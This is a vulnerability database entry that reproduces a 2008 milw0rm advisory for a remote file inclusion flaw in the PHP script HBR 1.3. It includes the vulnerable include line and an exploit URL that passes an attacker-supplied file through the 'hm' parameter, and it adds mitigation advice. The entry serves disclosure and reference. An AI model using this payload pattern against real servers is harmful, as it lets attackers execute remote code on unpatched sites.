HBR 1.3 (hm) Remote File Inclusion Vulnerability

vendor:

HBR 1.3

by:

Ghost Hacker [ R-H TeaM ]

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: HBR 1.3

Affected Version From: 1.3

Affected Version To: 1.3

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

HBR 1.3 (hm) Remote File Inclusion Vulnerability

HBR 1.3 (hm) is vulnerable to a remote file inclusion vulnerability. An attacker can exploit this vulnerability by sending a malicious URL to the vulnerable script. The malicious URL contains the path to the malicious file which will be included and executed on the vulnerable server.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated before being used in the application. Additionally, the application should be configured to only allow access to files from a specific directory.

Source

Exploit-DB raw data:

################################################################################
 HBR 1.3 (hm) Remote File Inclusion Vulnerability
################################################################################
[~] Found : Ghost Hacker [ R-H TeaM ]           |,  .-.  .-.  ,|
[~] HOME  : www.Real-Hack.net                   | )(_o/  \o_)( | 
[~] Email : Ghost-r00t@Hotmail.com              |/     /\     \|
[~] Script : HBR 1.3
[~] Download Script : http://www.hscripts.com/scripts/php/downloads/HBR_1_3.zip
################## [ I love the Messenger of Allah Mohammad ] ##################
[~] Error ( hioxBannerRotate.php ) :
include "$hm/admin/props.php";

[~] Exploit :
http://xxxx/[Path]/hioxBannerRotate.php?hm=[Evil]
################## [ I love the Messenger of Allah Mohammad ] ##################
[~] Gootz :
PROTO & Night Mare & Mr.PaTcH & Aseg-Rabe7 & x.CJP.x & Dmar al3noOoz & 4Bo3tB ..
Mr.JUVE & Mr.hope & LeGeNd HaCkEr & My Blog [ gh0st10.wordpress.com ] ..
All Member Real Hack & All My Friends And All Muslims Hackers ..
################################################################################
 Real Hack Team ( R-H ) ..
################################################################################

# milw0rm.com [2008-06-30]